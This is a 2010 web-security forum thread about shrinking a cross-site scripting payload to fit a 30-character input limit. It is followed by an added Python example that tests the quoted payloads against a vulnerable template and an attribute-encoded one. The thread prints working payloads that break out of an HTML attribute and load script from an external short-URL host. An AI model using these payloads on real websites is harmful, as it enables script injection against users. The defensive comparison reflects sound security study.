sla.ckers.org is ha.ckers sla.cking
Q and A for any cross site scripting information. Feel free to ask away. 
Short Script Block?
Posted by: nephijohnson
Date: January 12, 2010 12:29PM

I recently came across an XSS hole in a website I use frequently. I'm able to inject my own html into the page, but it's limited by the server to 30 characters.
This has turned into more of an academic challenge for me to try and insert something that will load an external javascript file.

The injection takes place in the value attribute of a text box, so it looks like this:

<input type="text" value="INSERT-HERE" />

Part of the 30 characters I am able to insert are needed to break out of the value attribute.

I've (with a little help) gotten it down to 34 characters:

"><script src=//ix.lt/##></script>

and in certain situations (explained in my blog here: http://gnarlysec.blogspot.com/2010/01/xss-and-ultra-short-urls.html) down to 27 characters:

"><script src=//ix.lt/##>/*

I've thought of trying to locate other script tags in the page through the DOM and changing the src attribute, but those all ended up too long.

Can anyone come up with something shorter? You can assume the domain for the external js file is five characters and the path is two characters.

Re: Short Script Block?
Posted by: Gareth Heyes
Date: January 12, 2010 02:01PM

Job done.


"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: Short Script Block?
Posted by: nephijohnson
Date: January 12, 2010 03:29PM

I'm not sure what you mean by the eval(name) part, but I did come up with a solution:

In browsers that use WebKit (I tested it with Chrome and Safari), you're able to use

<script src="..." />

This made a total count of 30 characters, meeting the max character count:

"><script src=http:ix.lt/## />

Also, in my specific situation, the original page was https, so using // instead of http: couldn't be used, since //ix.lt/## would load https://ix.lt/##, which ix.lt doesn't support.

Also, I had said that in certain situations you could only put the head tag of the script block followed by a multi-line javascript comment. I found that the multi-line comment is unnecessary (I elaborate more on my blog).

Re: Short Script Block?
Posted by: nephijohnson
Date: January 13, 2010 01:38PM

I get the eval(name) part now :) Thanks for the tip Gareth

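The defensive side of this thread, as an added example that is not code from any of the posters: the original post describes a value reflected unencoded into a text box's value attribute, with a 30-character server-side cap, and the follow-up shows that the cap still leaves room for a script element. The hypothetical `render_vulnerable` template below reproduces that reflection; `render_hardened` is the same template with attribute encoding (`html.escape(..., quote=True)`). The check runs Python's `html.parser` over both outputs and lists which elements other than the intended `<input>` appear, using the three payloads quoted in the thread as input. The point it makes is that a length cap limits the payload, not the vulnerability; encoding the `"` is what prevents the attribute from being terminated.

```python
import html
from html.parser import HTMLParser

# Added example. render_vulnerable / render_hardened are a hypothetical
# server-side template, not the site from the thread; the payload strings
# are the ones quoted in the thread.

LIMIT = 30  # the server-side length cap the post mentions (a size limit, not an encoding control)


def render_vulnerable(value: str) -> str:
    """Reflect the user value into the attribute unencoded, as the post describes."""
    return f'<input type="text" value="{value}" />'


def render_hardened(value: str) -> str:
    """Attribute-encode the value: quote=True turns " into &quot; (and & < > ' too),
    so the reflected text can never terminate the attribute it sits in."""
    return f'<input type="text" value="{html.escape(value, quote=True)}" />'


class _TagCollector(HTMLParser):
    """Record every element start tag and every <input value=...> as the parser decodes it."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.input_values: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_values.extend(v for k, v in attrs if k == "value" and v is not None)

    def handle_startendtag(self, tag, attrs):
        # Treat <x /> like <x> for element counting purposes.
        self.handle_starttag(tag, attrs)


def _parse(rendered: str) -> _TagCollector:
    parser = _TagCollector()
    parser.feed(rendered)
    parser.close()
    return parser


def injected_elements(rendered: str) -> list[str]:
    """Elements other than the intended <input> that the rendered markup now contains."""
    return [t for t in _parse(rendered).tags if t != "input"]


def reflected_value(rendered: str) -> str:
    """The decoded value attribute of the first <input>, or '' if it has none."""
    values = _parse(rendered).input_values
    return values[0] if values else ""


# Inputs: a benign value containing a quote, plus the 34-, 27- and 30-character
# payloads quoted in the thread (the last is the WebKit self-closing variant).
BENIGN = 'O"Brien'
PAYLOADS = [
    '"><script src=//ix.lt/##></script>',
    '"><script src=//ix.lt/##>/*',
    '"><script src=http:ix.lt/## />',
]


def audit(render) -> dict[str, list[str]]:
    """Map each payload that fits the cap to the elements it introduces under `render`."""
    return {p: injected_elements(render(p)) for p in PAYLOADS if len(p) <= LIMIT}


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        for payload, extra in audit(render).items():
            print(f"{name:10} {len(payload):2} chars -> extra elements: {extra}")
    print("hardened round-trips the benign value:", reflected_value(render_hardened(BENIGN)) == BENIGN)
```

`audit` filters on the cap to mirror the server's behaviour; the two payloads that fit it (27 and 30 characters) both introduce a `script` element under the vulnerable template and none under the hardened one, while the hardened template still returns the original string, quote included, when the attribute is decoded.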
